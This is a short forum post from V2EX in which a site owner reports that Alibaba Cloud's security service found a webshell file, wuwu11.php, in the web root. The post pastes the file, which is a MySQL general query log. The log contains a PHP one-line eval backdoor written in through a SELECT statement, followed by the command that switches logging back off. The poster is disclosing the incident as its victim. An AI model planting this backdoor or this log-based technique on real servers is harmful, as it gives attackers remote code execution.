阿里云云盾检测到发现后门 webshell 根目录多了一个 wuwu11.php 的文件, 内容是:
D:\web\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
65264 Init DB mysql
65264 Query SHOW TABLES FROM `mysql`
65264 Query SHOW TABLE STATUS FROM `mysql`
65264 Query SELECT CURRENT_USER()
65264 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
65264 Query SELECT CURRENT_USER()
65264 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
65264 Quit
180330 19:55:36 65265 Connect root@localhost on
65265 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci'
65265 Init DB mysql
65265 Init DB mysql
65265 Query select '<?php @eval($_POST[h])?>'
65265 Init DB mysql
65265 Query SHOW TABLES FROM `mysql`
65265 Query SHOW TABLE STATUS FROM `mysql`
65265 Query SELECT CURRENT_USER()
65265 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
65265 Query SELECT CURRENT_USER()
65265 Query SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
65265 Query SHOW TABLES
65265 Quit
180330 19:55:37 65266 Connect root@localhost on
65266 Query SET NAMES 'utf8' COLLATE 'utf8_general_ci'
65266 Init DB mysql
65266 Init DB mysql
65266 Query set global general_log = 'Off'
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.